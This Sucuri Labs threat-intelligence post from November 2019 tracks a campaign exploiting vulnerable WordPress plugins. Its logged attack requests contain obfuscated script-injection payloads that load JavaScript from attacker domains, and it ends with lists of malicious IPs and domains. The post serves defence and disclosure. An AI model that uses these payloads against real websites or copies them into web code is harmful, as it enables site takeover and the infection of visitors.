• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Plugins added to Malware Campaign: October 2019

November 6, 2019John Castro

FacebookTwitterSubscribe

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

  • Multi-Vector Attack in Server Logs: March 2019
  • Plugins Added to Malicious Campaign – April 2019
  • Malware Campaign Evolves to Target New Plugins: May 2019
  • Plugins Under Attack: June 2019
  • Plugins Under Attack: July 2019
  • Plugins Under Attack: August 2019
  • Plugins Under Attack: September 2019

Plugins Under Attack: October 2019

  • Blog Designer (New Payload)
  • WPeMatico RSS Feed Fetcher
  • Smart Google Code Inserter (New Payload)
  • Post Custom Templates Lite (New Payload)
  • Woody Ad Snippets
  • FV Flowplayer Video Player
  • Poll, Survey, Form & Quiz Maker
  • DELUCKS SEO
  • Social Metrics Tracker

Plugins that are continuing to be leveraged by attackers are:

  • Rich Reviews
  • Kiwi-Social-Share
  • Blog Designer
  • WP Live Chat Support
  • Yellow Pencil Visual Theme Customizer
  • Social Warfare
  • Yuzo Related Post
  • WP-Piwik

Plugin Payloads Added to the Campaign

Blog Designer

185.238.0.214 - action=save&blog_nonce=save&custom_css=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27%26%23x64%3B%26%23x61%3B%26%23x74%3B%26%23x61%3B%26colon%3B%26%23x74%3B%26%23x65%3B%26%23x78%3B%26%23x74%3B%26sol%3B...skipped...%3B%26lpar%3B%26%23x63%3B%26rpar%3B%26semi%3B%26rcub%3B%27%3E%3C%2Fscript%3E%3Cstyle%3E&updated=true] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WPeMatico RSS Feed Fetcher

159.65.65.204 - "GET /wp-admin/admin-post.php?wpematico-action=settings_tab_settings HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" 

Smart Google Code Inserter

192.169.159.241 - action=savegooglecode&home=https://track.beforwardplay.com/track/uu?t=1&&sgcgoogleanalytic=<script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var c &equals; b&period;createEle&#...skipped...arCode&lpar;104&comma;101&comma;97&comma;100&rpar;&rpar;&lsqb;0&rsqb;&period;appendChild&lpar;c&rpar;&semi;&rcub;'></script>&sgcwebtools=&siteurl=https://track.beforwardplay.com/track/uu.js?t=1& "POST /wp-admin/admin-ajax.php HTTP/1.1"

Post Custom Templates Lite

192.99.38.186 - otw_pctl_action=manage_otw_pctl_options&otw_pctl_custom_css=</textarea><script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var&...skipped...&lpar;c&rpar;&semi;&rcub;'></script> "POST /wp-admin/admin-post.php HTTP/1.1" 

Woody Ad Snippets

162.241.149.54 - --fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22wbcr_inp_import_files\x22; filename=\x22lc.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x22generator\x22:\x22x\x22,\x22date_created\x22:\x22x\x22,\x22snippets\x22:[{\x22name\x22:\x22x\x22,\x22title\x22:\x22\x22,\x22content\x22:\x22x\x22,\x22location\x22:\x22header\x22,\x22type\x22:\x22php\x22,\x22filters\x22:\x22\x22,\x22changed_filters\x22:\x220\x22,\x22scope\x22:\x22everywhere\x22,\x22description\x22:\x22<script type=text/javascript src='https://cls.balantfromsun.com/cls.js?z=1&&v=2'></script>\x22,\x22attributes\x22:\x22\x22,\x22tags\x22:[]}]}\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22swpsmtp_import_settings\x22\x0D\x0A\x0D\x0A1\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aswpsmtp_clear_log\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5--\x0D\x0A] "POST /wp-admin/admin-post.php HTTP/1.1"

FV Flowplayer Video Player

162.241.149.54 - action=fv_wp_flowplayer_email_signup&email=%3Csvg%2Fonload%3Deval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C49%2C55%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3E%40test.com&list=1 [08/Oct/2019:12:54:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Poll, Survey, Form & Quiz Maker

50.63.162.9 -  "GET /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=\x22><script type=text/javascript src='https://cd.privacylocationforloc.com/track&v15'></script> HTTP/1.1"

DELUCKS SEO

167.99.232.64 - dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bdpc_status_basic_metadata%5D=1&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives%5D%5Btitle%5D%5Bdelimiter%5D=-&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives...skipped...5Bgoogle%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Bpinterest%5D=&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Byandex%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc_save_settings=1 "POST /wp-admin/admin-post.php HTTP/1.1" 

Social Metrics Tracker

50.63.162.9 - gapi_client_id=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v5%27%3E%3C%2Fscript%3E "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi HTTP/1.1"

Malicious Domains and IPs:

IPs:

159.65.65.204
192.169.243.42
167.99.232.64
50.63.162.9
192.169.159.241
185.238.0.214
192.99.38.186
159.203.175.216
80.211.164.226
162.241.149.53
186.147.2.49

Domains Injected:

  • track[.]beforwardplay[.]com
  • cls[.]balantfromsun[.]com
  • cd[.]privacylocationforloc[.]com
  • bes[.]belaterbewasthere[.]com
  • ave[.]cervantes[.]es
  • hungthinhsg[.]com[.]vn

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, WordPress SecurityTags: Labs Note, WordPress Plugins and Themes

About John Castro

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

How to know you can trust a plugin

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.